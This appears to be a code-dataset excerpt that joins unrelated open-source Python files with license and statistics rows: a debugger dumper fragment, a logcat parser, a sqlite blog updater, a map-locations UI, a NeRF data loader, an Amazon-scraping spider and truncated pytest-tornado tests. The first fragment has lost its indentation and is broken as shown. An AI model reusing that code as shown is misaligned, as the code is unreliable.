def setupDumpers(self, _ = {}):
self.resetCaches()
for mod in self.dumpermodules:
m = __import__(mod)
dic = m.__dict__
for name in dic.keys():
item = dic[name]
self.registerDumper(name, item)
msg = "dumpers=["
for key, value in self.qqFormats.items():
editable = ',editable="true"' if key in self.qqEditable else ''
formats = (',formats=\"%s\"' % str(value)[1:-1]) if len(value) else ''
msg += '{type="%s"%s%s},' % (key, editable, formats)
msg += '],'
v = 10000 * sys.version_info[0] + 100 * sys.version_info[1] + sys.version_info[2]
msg += 'python="%d"' % v
return msg
def reloadDumpers(self, args):
for mod in self.dumpermodules:
m = sys.modules[mod]
if sys.version_info[0] >= 3:
import importlib
importlib.reload(m)
else:
reload(m)
self.setupDumpers(args)
def addDumperModule(self, args):
path = args['path']
(head, tail) = os.path.split(path)
sys.path.insert(1, head)
self.dumpermodules.append(os.path.splitext(tail)[0])
def extractQStringFromQDataStream(self, buf, offset):
""" Read a QString from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('utf-16be')
return (string, offset + size)
def extractQByteArrayFromQDataStream(self, buf, offset):
""" Read a QByteArray from the stream """
size = struct.unpack_from("!I", buf, offset)[0]
offset += 4
string = buf[offset:offset + size].decode('latin1')
return (string, offset + size)
def extractIntFromQDataStream(self, buf, offset):
""" Read an int from the stream """
value = struct.unpack_from("!I", buf, offset)[0]
return (value, offset + 4)
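    # Minimal sketch of the wire format the three helpers above assume: every
    # value is big-endian and length-prefixed. For example (hypothetical data):
    #   payload = "hello".encode("utf-16be")
    #   buf = struct.pack("!I", len(payload)) + payload
    #   self.extractQStringFromQDataStream(buf, 0)  # -> ("hello", 4 + len(payload))
    # The QByteArray variant decodes latin1 instead, and the int variant simply
    # reads the 4-byte value with no payload.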
def handleInterpreterMessage(self):
""" Return True if inferior stopped """
resdict = self.fetchInterpreterResult()
return resdict.get('event') == 'break'
def reportInterpreterResult(self, resdict, args):
print('interpreterresult=%s,token="%s"'
% (self.resultToMi(resdict), args.get('token', -1)))
def reportInterpreterAsync(self, resdict, asyncclass):
print('interpreterasync=%s,asyncclass="%s"'
% (self.resultToMi(resdict), asyncclass))
def removeInterpreterBreakpoint(self, args):
res = self.sendInterpreterRequest('removebreakpoint', { 'id' : args['id'] })
return res
def insertInterpreterBreakpoint(self, args):
args['condition'] = self.hexdecode(args.get('condition', ''))
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
resdict = args.copy()
bp = None if response is None else response.get("breakpoint", None)
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
self.createResolvePendingBreakpointsHookBreakpoint(args)
resdict['number'] = -1
resdict['pending'] = 1
resdict['warning'] = 'Direct interpreter breakpoint insertion failed.'
self.reportInterpreterResult(resdict, args)
def resolvePendingInterpreterBreakpoint(self, args):
self.parseAndEvaluate('qt_qmlDebugEnableService("NativeQmlDebugger")')
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
resdict = args.copy()
if bp:
resdict['number'] = bp
resdict['pending'] = 0
else:
resdict['number'] = -1
resdict['pending'] = 0
resdict['error'] = 'Pending interpreter breakpoint insertion failed.'
self.reportInterpreterAsync(resdict, 'breakpointmodified')
def fetchInterpreterResult(self):
buf = self.parseAndEvaluate("qt_qmlDebugMessageBuffer")
size = self.parseAndEvaluate("qt_qmlDebugMessageLength")
msg = self.hexdecode(self.readMemory(buf, size))
# msg is a sequence of 'servicename<space>msglen<space>msg' items.
resdict = {} # Native payload.
while len(msg):
pos0 = msg.index(' ') # End of service name
pos1 = msg.index(' ', pos0 + 1) # End of message length
service = msg[0:pos0]
msglen = int(msg[pos0+1:pos1])
msgend = pos1+1+msglen
payload = msg[pos1+1:msgend]
msg = msg[msgend:]
if service == 'NativeQmlDebugger':
try:
resdict = json.loads(payload)
continue
except:
warn("Cannot parse native payload: %s" % payload)
else:
print('interpreteralien=%s'
% {'service': service, 'payload': self.hexencode(payload)})
try:
expr = 'qt_qmlDebugClearBuffer()'
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Cleaning buffer failed: %s: %s" % (expr, error))
return resdict
def sendInterpreterRequest(self, command, args = {}):
encoded = json.dumps({ 'command': command, 'arguments': args })
hexdata = self.hexencode(encoded)
expr = 'qt_qmlDebugSendDataToService("NativeQmlDebugger","%s")' % hexdata
try:
res = self.parseAndEvaluate(expr)
except RuntimeError as error:
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
except AttributeError as error:
# Happens with LLDB and 'None' current thread.
warn("Interpreter command failed: %s: %s" % (encoded, error))
return {}
if not res:
warn("Interpreter command failed: %s " % encoded)
return {}
return self.fetchInterpreterResult()
def executeStep(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepin', args)
self.doContinue()
def executeStepOut(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepout', args)
self.doContinue()
def executeNext(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('stepover', args)
self.doContinue()
def executeContinue(self, args):
if self.nativeMixed:
response = self.sendInterpreterRequest('continue', args)
self.doContinue()
def doInsertInterpreterBreakpoint(self, args, wasPending):
#warn("DO INSERT INTERPRETER BREAKPOINT, WAS PENDING: %s" % wasPending)
# Will fail if the service is not yet up and running.
response = self.sendInterpreterRequest('setbreakpoint', args)
bp = None if response is None else response.get("breakpoint", None)
if wasPending:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'error': 'Pending interpreter breakpoint insertion failed.'}, args)
return
else:
if not bp:
self.reportInterpreterResult({'bpnr': -1, 'pending': 1,
'warning': 'Direct interpreter breakpoint insertion failed.'}, args)
self.createResolvePendingBreakpointsHookBreakpoint(args)
return
self.reportInterpreterResult({'bpnr': bp, 'pending': 0}, args)
def isInternalInterpreterFrame(self, functionName):
if functionName is None:
return False
if functionName.startswith("qt_v4"):
return True
return functionName.startswith(self.qtNamespace() + "QV4::")
# Hack to avoid QDate* dumper timeouts with GDB 7.4 on 32 bit
# due to misaligned %ebx in SSE calls (qstring.cpp:findChar)
def canCallLocale(self):
return True
def isReportableInterpreterFrame(self, functionName):
return functionName and functionName.find("QV4::Moth::VME::exec") >= 0
def extractQmlData(self, value):
if value.type.code == PointerCode:
value = value.dereference()
data = value["data"]
return data.cast(self.lookupType(str(value.type).replace("QV4::", "QV4::Heap::")))
# Contains iname, name, and value.
class LocalItem:
pass
def extractInterpreterStack(self):
return self.sendInterpreterRequest('backtrace', {'limit': 10 })
| gpl-3.0 | 2,995,124,426,568,365,000 | 36.45848 | 103 | 0.55573 | false |
chapinb/shattered | libs/liblogcat.py | 1 | 4282 | #!/usr/bin/env python3
##################################################################################
## ##
## _____ _ _ _ _ ##
## | __| |_ ___| |_| |_ ___ ___ ___ _| | ##
## |__ | | .'| _| _| -_| _| -_| . | ##
## |_____|_|_|__,|_| |_| |___|_| |___|___| ##
## ##
## ##
## Special Thanks to Julie Desautels, Jon Rajewski, and the LCDI for the ##
## research leading to the success of this script. ##
## ##
## Copyright 2013, Chapin Bryce ##
## This program is free software: you can redistribute it and/or modify ##
## it under the terms of the GNU General Public License as published by ##
## the Free Software Foundation, either version 3 of the License, or ##
## any later version. ##
## ##
## This program is distributed in the hope that it will be useful, ##
## but WITHOUT ANY WARRANTY; without even the implied warranty of ##
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ##
## GNU General Public License for more details. ##
## ##
## You should have received a copy of the GNU General Public License ##
## along with this program. If not, see <http://www.gnu.org/licenses/>. ##
## ##
##################################################################################
## Logcat Parser
"""
This module is designed to parse data within the logcat export from shattered.
Import it and call logcat_parser() with the input and output file paths;
the output format is CSV.
e.g. liblogcat.logcat_parser("logcat.txt", "logcat.csv")
"""
import re
import os
import sys
def logcat_version():
"""
Function for calling the version of the code
"""
version = 20140213
print("Logcat Parser version: ", version)
def logcat_parser(inputfile, outputfile):
"""
This function parses the data from a logcat input file into csv format for easier reading.
Can be run as standalone script (ie ./logcat_lib.py) or imported to another script.
"""
logcat_version()
print("Parsing Logcat File...")
fin = open(inputfile, 'r')
fout = open(outputfile, 'w')
fout.write("Date, Time, PID, Level, Tag, Data")
bucket = ""
logname = re.compile(r'----*')
metainfostart = re.compile(r'^\[ \d')
metainfoend = re.compile(r'\]$')
anytext = re.compile(r'.*')
for line in fin:
line = line.strip()
if logname.findall(line):
print("Processesing Log: " + line)
loginfo = "Processesing Log: " + line
elif metainfoend.findall(line) and metainfostart.findall(line):
meta = line
meta = logcat_meta(meta)
fout.write(meta)
elif anytext.findall(line):
data = line
data = data.strip()
data = data.replace(",", " ")
bucket = data
fout.write(bucket)
fout.flush()
fout.close()
print("####################\nLogcat Processing Complete\n####################")
def logcat_meta(meta):
"""
This function breaks down the meta data information to allow better sorting and
filtering in CSV interpreters
"""
meta_a = meta.split()
date = meta_a[1]
time = meta_a[2]
pid = meta_a[3]
service = meta_a[4]
service_a = service.split("/")
level = service_a[0]
tag = service_a[1]
meta_out = "\n" + date + "," + time + "," + pid + "," + level + "," + tag + ","
return meta_out
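# Illustrative example (hypothetical logcat meta line, not from a real capture):
# logcat_meta("[ 12-25 10:30:00.000 1234 I/ActivityManager ]")
# returns "\n12-25,10:30:00.000,1234,I,ActivityManager,"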
| gpl-3.0 | 5,323,526,873,882,407,000 | 35.234783 | 94 | 0.429939 | false |
zzir/white | update_content.py | 1 | 3484 | import sqlite3
from wtforms.fields import StringField, IntegerField
from wtforms import validators
from wtforms_tornado import Form
from config import CONFIG
from get_content import TContents
class CheckContents(Form):
title = StringField(validators=[validators.length(min=1, max=100)])
slug = StringField(validators=[
validators.length(min=1, max=50),
validators.regexp(r"^[A-Za-z0-9_-]*$")
])
tags = StringField(validators=[validators.length(min=1, max=150)])
column = StringField(validators=[validators.length(max=50)], default='')
text = StringField(validators=[validators.length(min=1)])
short = StringField(validators=[validators.length(max=512)], default='')
top = IntegerField(validators=[validators.AnyOf([0,1])], default=0)
feed = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
comment = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
status = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
original = IntegerField(validators=[validators.AnyOf([0,1])], default=1)
def add_contents(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title = TContents().check_title(title)
same_slug = TContents().check_slug(slug)
if same_title != 'ok':
return "same Title!"
if same_slug != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"insert into blog_contents \
values (Null,?,?,?,?,?,?,?,?,?,?,?,?,?)",
(title, slug, created, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original))
con.commit()
con.close()
return 'ok'
except:
return 'no'
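# Usage sketch (illustrative values only):
# add_contents("Hello", "hello-world", 1510000000, 1510000000, "misc", "",
#              "body text", "", 0, 1, 1, 1, 1)
# returns 'ok' on success, 'same Title!' / 'same Slug!' for duplicates,
# and 'no' if the INSERT itself fails.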
def update_contents(pid, title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original):
"""数据check后插入contents数据表"""
# 检查title或者slug是否与数据库中重复
same_title_id = TContents().check_title_id(title,pid)
same_slug_id = TContents().check_slug_id(slug,pid)
if same_title_id != 'ok':
return "same Title!"
if same_slug_id != 'ok':
return "same Slug!"
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"update blog_contents set \
title = ?, \
slug = ?, \
modified = ?, \
tags = ?, \
column = ?, \
text = ?, \
short = ?, \
allow_top = ?, \
allow_comment = ?, \
allow_feed = ?, \
status = ?, \
original=? where id = ?",
(title, slug, modified, tags, column, text, short,
allow_top, allow_comment, allow_feed, status, original, pid)
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
def DelPost(pid):
try:
con = sqlite3.connect(CONFIG['DB_FILE'])
cur = con.cursor()
cur.execute(
"delete from blog_contents where id =?", (pid, )
)
con.commit()
con.close()
return 'ok'
except:
return 'no'
| mit | 5,526,406,091,569,730,000 | 30.192661 | 76 | 0.573235 | false |
IntegerMan/Pi-MFD | PiMFD/Applications/Navigation/MapLocations.py | 1 | 9253 | # coding=utf-8
"""
This file contains map locations information
"""
from PiMFD.Applications.MFDPage import MFDPage
from PiMFD.UI.Button import MFDButton
from PiMFD.UI.TextBoxes import TextBox
from PiMFD.UI.Widgets.MenuItem import TextMenuItem
__author__ = 'Matt Eland'
class MapLocation(object):
"""
Represents a location on the map
:param name: The name of the location
:type name: basestring
:param lat: The latitude
:type lat: float
:param lng: The longitude
:type lng: float
"""
name = None
lat = None
lng = None
tags = {}
id = None
def __init__(self, name, lat, lng):
super(MapLocation, self).__init__()
self.name = name
self.lat = lat
self.lng = lng
class MapLocationAddPage(MFDPage):
id = None
def __init__(self, controller, application, back_page):
super(MapLocationAddPage, self).__init__(controller, application)
self.btn_back = MFDButton("BACK")
self.btn_add_location = MFDButton("ADD")
self.back_page = back_page
self.lbl_header = self.get_header_label('Add Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.data_provider = application.data_provider
self.set_focus(self.txt_name)
def set_values_from_context(self, context):
if context:
self.txt_lat.text = str(context.lat)
self.txt_lng.text = str(context.lng)
self.txt_name.text = context.get_display_name()
self.id = context.id
def get_lower_buttons(self):
return [self.btn_back, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Add
# Actually add the thing
location = MapLocation(self.txt_name.text, self.txt_lat.text, self.txt_lng.text)
location.id = self.id
self.data_provider.add_location(location)
self.application.select_page(self.back_page)
return True
return super(MapLocationAddPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_add_location.enabled = True
else:
self.btn_add_location.enabled = False
return super(MapLocationAddPage, self).arrange()
def render(self):
return super(MapLocationAddPage, self).render()
class MapLocationDetailsPage(MFDPage):
def __init__(self, controller, application, location, back_page):
super(MapLocationDetailsPage, self).__init__(controller, application)
self.location = location
self.btn_back = MFDButton("BACK")
self.btn_save = MFDButton("SAVE")
self.btn_home = MFDButton("HOME")
self.btn_delete = MFDButton("DEL")
self.back_page = back_page
self.lbl_header = self.get_header_label('Edit Location')
self.txt_name = TextBox(self.display, self, label='Name:', text_width=300, text=location.name)
self.txt_lat = TextBox(self.display, self, label=' Lat:', text_width=180, text=location.lat)
self.txt_lng = TextBox(self.display, self, label='Long:', text_width=180, text=location.lng)
self.txt_name.set_alphanumeric()
self.txt_name.max_length = 20
self.txt_lat.max_length = 12
self.txt_lng.max_length = 12
self.txt_lat.set_numeric(allow_decimal=True)
self.txt_lng.set_numeric(allow_decimal=True)
self.panel.children = [self.lbl_header, self.txt_name, self.txt_lat, self.txt_lng]
self.set_focus(self.txt_name)
def get_lower_buttons(self):
return [self.btn_back, self.btn_save, self.btn_home, None, self.btn_delete]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Save
# Actually add the thing
self.location.name = self.txt_name.text
self.location.lat = self.txt_lat.text
self.location.lng = self.txt_lng.text
self.application.data_provider.save_locations()
self.application.select_page(self.back_page)
return True
elif index == 2: # Home
# Set this as home
self.controller.options.lat = float(self.txt_lat.text)
self.controller.options.lng = float(self.txt_lng.text)
return True
elif index == 4: # Delete
            # TODO: Once my UI framework has grown a bit more, add a confirmation step.
self.application.delete_location(self.location)
self.application.select_page(self.back_page)
return True
return super(MapLocationDetailsPage, self).handle_lower_button(index)
def arrange(self):
# Update the valid state of the add button
if self.txt_lng.has_text() and self.txt_lat.has_text() and self.txt_name.has_text():
self.btn_save.enabled = True
else:
self.btn_save.enabled = False
# Mark as home if it's your home location
try:
if float(self.txt_lat.text) == self.controller.options.lat and \
float(self.txt_lng.text) == self.controller.options.lng:
self.btn_home.selected = True
else:
self.btn_home.selected = False
except:
self.btn_home.selected = False
return super(MapLocationDetailsPage, self).arrange()
def render(self):
return super(MapLocationDetailsPage, self).render()
class MapLocationsPage(MFDPage):
"""
Lists map locations the user has saved
:param controller: The controller
:param application: The navigation application
:param map_context: The map context
"""
def __init__(self, controller, application, map_context, back_page):
super(MapLocationsPage, self).__init__(controller, application)
self.map_context = map_context
self.data_provider = application.data_provider
self.btn_back = MFDButton("BACK")
self.btn_edit_location = MFDButton("EDIT")
self.btn_add_location = MFDButton("NEW")
self.back_page = back_page
def handle_selected(self):
is_first = True
self.clear_focusables()
if self.data_provider.locations and len(self.data_provider.locations) > 0:
self.panel.children = [self.get_header_label('Locations ({})'.format(len(self.data_provider.locations)))]
for l in self.data_provider.locations:
item = TextMenuItem(self.display, self, '{}: {}, {}'.format(l.name, l.lat, l.lng))
item.font = self.display.fonts.list
item.data_context = l
self.panel.children.append(item)
if is_first:
self.set_focus(item)
is_first = False
super(MapLocationsPage, self).handle_selected()
def handle_control_state_changed(self, widget):
location = widget.data_context
if location:
self.application.show_map(location.lat, location.lng)
super(MapLocationsPage, self).handle_control_state_changed(widget)
def get_lower_buttons(self):
return [self.btn_back, self.btn_edit_location, self.btn_add_location]
def handle_lower_button(self, index):
if index == 0: # Back
self.application.select_page(self.back_page)
return True
elif index == 1: # Edit
if self.focus:
loc = self.focus.data_context
if loc:
self.application.select_page(MapLocationDetailsPage(self.controller, self.application, loc, self))
return True
elif index == 2: # Add
self.application.select_page(MapLocationAddPage(self.controller, self.application, self))
return True
return super(MapLocationsPage, self).handle_lower_button(index)
def get_button_text(self):
return "GOTO"
def arrange(self):
return super(MapLocationsPage, self).arrange()
def render(self):
        if not self.data_provider.locations or len(self.data_provider.locations) == 0:
self.center_text("NO LOCATIONS DEFINED")
else:
return super(MapLocationsPage, self).render() | gpl-2.0 | -5,634,889,265,219,760,000 | 31.584507 | 118 | 0.608451 | false |
google/nerfactor | nerfactor/datasets/nerf.py | 1 | 9257 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import basename, dirname, join, exists
import numpy as np
from PIL import Image
import tensorflow as tf
from third_party.xiuminglib import xiuminglib as xm
from nerfactor.util import logging as logutil, io as ioutil, tensor as tutil, \
img as imgutil
from nerfactor.datasets.base import Dataset as BaseDataset
logger = logutil.Logger(loggee="datasets/nerf")
class Dataset(BaseDataset):
def __init__(self, config, mode, debug=False, always_all_rays=False, spp=1):
self.meta2img = {}
# To allow supersampling a pixel
sps = np.sqrt(spp) # samples per side
assert sps == int(sps), (
"Samples per pixel must be a square number so that samples per "
"side are integers")
self.sps = int(sps)
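        # e.g. spp=4 -> sps=2, i.e. a 2x2 grid of sub-pixel samples, so the ray
        # grids produced by _gen_rays() are (H * sps, W * sps, 3).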
# Parent init.
super().__init__(config, mode, debug=debug)
# Trigger init. in a main thread before starting multi-threaded work.
# See http://yaqs/eng/q/6292200559345664 for details
Image.init()
# To allow getting all rays for training images
self.always_all_rays = always_all_rays
def get_n_views(self):
if hasattr(self, 'files'):
return len(self.files)
raise RuntimeError("Call `_glob()` before `get_n_views()`")
def _get_batch_size(self):
if self.mode == 'train':
bs = self.config.getint('DEFAULT', 'n_rays_per_step')
else:
# Total number of pixels is batch size, and will need to load
# a datapoint to figure that out
any_path = self.files[0]
ret = self._load_data(any_path)
map_data = ret[-1] # OK as long as shape is (H, W[, ?])
bs = int(np.prod(map_data.shape[:2]))
return bs
def _glob(self):
root = self.config.get('DEFAULT', 'data_root')
if self.mode in ('train', 'test'):
mode_str = self.mode
else:
mode_str = 'val'
metadata_dir = join(root, '%s_???' % mode_str)
# Shortcircuit if testing
if self.mode == 'test':
metadata_paths = xm.os.sortglob(metadata_dir, 'metadata.json')
logger.info(
"Number of '%s' views: %d", self.mode, len(metadata_paths))
return metadata_paths
# Training or validation
# Include only cameras with paired RGB images
metadata_paths = []
for metadata_path in xm.os.sortglob(metadata_dir, 'metadata.json'):
img_path = join(dirname(metadata_path), 'rgba.png')
if exists(img_path):
metadata_paths.append(metadata_path)
self.meta2img[metadata_path] = img_path
else:
logger.warning((
"Skipping camera\n\t%s\nbecause its paried RGB image"
"\n\t%s\ndoesn't exist"), metadata_path, img_path)
logger.info("Number of '%s' views: %d", self.mode, len(metadata_paths))
return metadata_paths
@staticmethod
def _parse_id(metadata_path): # pylint: disable=arguments-differ
return basename(dirname(metadata_path))
# pylint: disable=arguments-differ
def _process_example_postcache(self, id_, rayo, rayd, rgb):
"""Records image dimensions and samples rays.
"""
hw = tf.shape(rgb)[:2]
rayo, rayd, rgb = self._sample_rays(rayo, rayd, rgb)
# NOTE: some memory waste below to make distributed strategy happy
id_ = tf.tile(tf.expand_dims(id_, axis=0), (tf.shape(rgb)[0],))
hw = tf.tile(tf.expand_dims(hw, axis=0), (tf.shape(rgb)[0], 1))
return id_, hw, rayo, rayd, rgb
def _sample_rays(self, rayo, rayd, rgb):
# Shortcircuit if need all rays
if self.mode in ('vali', 'test') or self.always_all_rays:
rayo = tf.reshape(rayo, (-1, 3))
rayd = tf.reshape(rayd, (-1, 3))
rgb = tf.reshape(rgb, (-1, 3))
return rayo, rayd, rgb
# Training: sample rays
coords = tf.stack(
tf.meshgrid(
tf.range(tf.shape(rgb)[0]), tf.range(tf.shape(rgb)[1]),
indexing='ij'),
axis=-1)
coords = tf.reshape(coords, (-1, 2))
# Use tf.random instead of np.random here so that the randomness is
# correct even if we compile this to static graph using tf.function
select_ind = tf.random.uniform(
(self.bs,), minval=0, maxval=tf.shape(coords)[0], dtype=tf.int32)
select_ind = tf.gather_nd(coords, select_ind[:, None])
rayo = tf.gather_nd(rayo, select_ind)
rayd = tf.gather_nd(rayd, select_ind)
rgb = tf.gather_nd(rgb, select_ind)
return rayo, rayd, rgb
def _process_example_precache(self, path):
"""Loads data from paths.
"""
id_, rayo, rayd, rgb = tf.py_function(
self._load_data, [path],
(tf.string, tf.float32, tf.float32, tf.float32))
return id_, rayo, rayd, rgb
def _load_data(self, metadata_path): # pylint: disable=arguments-differ
imh = self.config.getint('DEFAULT', 'imh')
white_bg = self.config.getboolean('DEFAULT', 'white_bg')
metadata_path = tutil.eager_tensor_to_str(metadata_path)
id_ = self._parse_id(metadata_path)
# Generate rays
metadata = ioutil.read_json(metadata_path)
imw = int(imh / metadata['imh'] * metadata['imw'])
cam_to_world = np.array([
float(x) for x in metadata['cam_transform_mat'].split(',')
]).reshape(4, 4)
cam_angle_x = metadata['cam_angle_x']
rayo, rayd = self._gen_rays(cam_to_world, cam_angle_x, imh, imw)
rayo, rayd = rayo.astype(np.float32), rayd.astype(np.float32)
# Shortcircuit if testing
if self.mode == 'test':
rgb = np.zeros((imh, imw, 3), dtype=np.float32) # placeholder
return id_, rayo, rayd, rgb
# Training or validation, where each camera has a paired image
img_path = self.meta2img[metadata_path]
rgba = xm.io.img.load(img_path)
assert rgba.ndim == 3 and rgba.shape[2] == 4, "Input image is not RGBA"
rgba = xm.img.normalize_uint(rgba)
# Resize RGB
if imh != rgba.shape[0]:
rgba = xm.img.resize(rgba, new_h=imh)
rgb, alpha = rgba[:, :, :3], rgba[:, :, 3]
# Composite RGBA image onto white or black background
bg = np.ones_like(rgb) if white_bg else np.zeros_like(rgb)
rgb = imgutil.alpha_blend(rgb, alpha, tensor2=bg)
rgb = rgb.astype(np.float32)
return id_, rayo, rayd, rgb
# pylint: disable=arguments-differ
def _gen_rays(self, to_world, angle_x, imh, imw):
near = self.config.getfloat('DEFAULT', 'near')
ndc = self.config.getboolean('DEFAULT', 'ndc')
# Ray origin
cam_loc = to_world[:3, 3]
rayo = np.tile( # (H * SPS, W * SPS, 3)
cam_loc[None, None, :], (imh * self.sps, imw * self.sps, 1))
# Ray directions
xs = np.linspace(0, imw, imw * self.sps, endpoint=False)
ys = np.linspace(0, imh, imh * self.sps, endpoint=False)
xs, ys = np.meshgrid(xs, ys)
# (0, 0)
# +--------> (w, 0)
# | x
# |
# v y (0, h)
fl = .5 * imw / np.tan(.5 * angle_x)
rayd = np.stack(
((xs - .5 * imw) / fl, -(ys - .5 * imh) / fl, -np.ones_like(xs)),
axis=-1) # local
rayd = np.sum(
rayd[:, :, np.newaxis, :] * to_world[:3, :3], axis=-1) # world
if ndc:
# TODO: not in use, so need to check correctness
# NeRF NDC expects OpenGL coordinates, where up is +y, and forward
# -z, so we need to flip the rays coming from SfM cameras
cv2gl_rot = np.diag((1.0, -1.0, -1.0))
rayo = rayo.dot(cv2gl_rot)
rayd = rayd.dot(cv2gl_rot)
# Shift ray origins to near plane
t = -(near + rayo[..., 2]) / rayd[..., 2]
rayo += t[..., None] * rayd
# Projection
o1 = -1. / (imw / (2. * fl)) * rayo[..., 0] / rayo[..., 2]
o2 = -1. / (imh / (2. * fl)) * rayo[..., 1] / rayo[..., 2]
o3 = 1. + 2. * near / rayo[..., 2]
d1 = -1. / (imw / (2. * fl)) * (
rayd[..., 0] / rayd[..., 2] - rayo[..., 0] / rayo[..., 2])
d2 = -1. / (imh / (2. * fl)) * (
rayd[..., 1] / rayd[..., 2] - rayo[..., 1] / rayo[..., 2])
d3 = -2. * near / rayo[..., 2]
rayo = np.dstack((o1, o2, o3))
rayd = np.dstack((d1, d2, d3))
return rayo, rayd
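    # Rough usage sketch (illustrative values only, not from any config):
    #   to_world = np.eye(4)   # camera at the origin, looking down -z
    #   rayo, rayd = self._gen_rays(to_world, angle_x=0.7, imh=4, imw=4)
    # With ndc disabled, rayo and rayd both have shape (4 * self.sps, 4 * self.sps, 3)
    # and every rayo entry equals the camera location to_world[:3, 3].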
| apache-2.0 | 779,771,498,087,342,300 | 42.055814 | 80 | 0.555796 | false |
Superjom/bad_source | python/paper/spider/spider/spiders/amazon_notebook.py | 1 | 2872 | # -*- coding: utf-8 -*-
from __future__ import division
import sys
sys.path.append('../../')
import re
import time
import random
import urlparse as up
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.exceptions import CloseSpider
from scrapy.http.request import Request
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from spider.items import SpiderItem
'''
Created on Jul 30, 2013
@author: Chunwei Yan @ pkusz
@mail: [email protected]
'''
#base_url = r'http://www.amazon.com/*'
root = "/home/chunwei/bad_source/python/paper/spider/spider/spiders"
allowed_url = r'http://www.amazon.com/s/.*keywords=notebook.*'
content_url_format = '//h3[contains(@class,"newaps")]/a[contains(@href,"amazon.com")]/@href'
init_start_urls = [
"http://www.amazon.com/s/ref=sr_nr_n_11?rh=n%3A565108%2Ck%3Anotebook&keywords=notebook&ie=UTF8&qid=1384484919&rnid=2941120011"
]
init_allowed_domains = [
"amazon.com",
]
MAX_SLEEP_TIME = 20
class SpiderSpider(CrawlSpider):
count = 0
name = "amazon_notebook"
allowed_domains = init_allowed_domains
dic = set()
start_urls = init_start_urls
rules = (
#only extract links here
#Rule(SgmlLinkExtractor(allow=allowed_url)),
#extract content here and parse urls
Rule(SgmlLinkExtractor(allow=allowed_url), callback="parse"),
)
@property
def sleep_time(self):
return random.random() * MAX_SLEEP_TIME
def parse(self, response):
'''
extract
title
content
url
'''
print '>'*50
print 'response url: ', response.url
hxs = HtmlXPathSelector(response)
        print '>>>> response.url: ', response.url
#get urls
content_urls = hxs.select(content_url_format).extract()
list_urls = hxs.select('//span[contains(@class,"pagnLink")]/a[contains(@href,"keywords=notebook")]/@href').extract()
list_urls = [ up.urljoin(response.url, url) for url in list_urls]
print "@" * 60
time.sleep(self.sleep_time)
self.start_urls.extend(list_urls)
for url in list_urls:
yield Request(url, self.parse)
content_re = re.compile(r'http://www.amazon.com/[^s]+.*&keywords=notebook$')
for url in content_urls:
if content_re.match(url):
if len(self.dic) > 450:
self.start_urls = []
raise CloseSpider('reach pages limit, end the spider.')
self.count += 1
self.dic.add( hash(url))
#extract data
item = SpiderItem()
item['url'] = url
item['kind'] = 'amazon_notebook'
yield item
if __name__ == "__main__":
pass
| gpl-2.0 | 4,343,573,823,116,785,700 | 26.883495 | 134 | 0.614206 | false |
eugeniy/pytest-tornado | test/test_fixtures.py | 1 | 1385 | import pytest
import sys
from tornado import gen
_used_fixture = False
@gen.coroutine
def dummy(io_loop):
yield gen.sleep(0)
raise gen.Return(True)
@pytest.fixture(scope='module')
def preparations():
global _used_fixture
_used_fixture = True
pytestmark = pytest.mark.usefixtures('preparations')
@pytest.mark.xfail(pytest.__version__ < '2.7.0',
reason='py.test 2.7 adds hookwrapper, fixes collection')
@pytest.mark.gen_test
def test_uses_pytestmark_fixtures(io_loop):
assert (yield dummy(io_loop))
assert _used_fixture
class TestClass:
def beforeEach(self):
global _used_fixture
_used_fixture = False
@pytest.mark.gen_test
def test_uses_pytestmark_fixtures(self, io_loop):
assert (yield dummy(io_loop))
assert _used_fixture
@pytest.mark.xfail(sys.version_info < (3, 5),
reason='Type hints added in Python 3.5')
def test_type_annotation(testdir):
testdir.makepyfile(
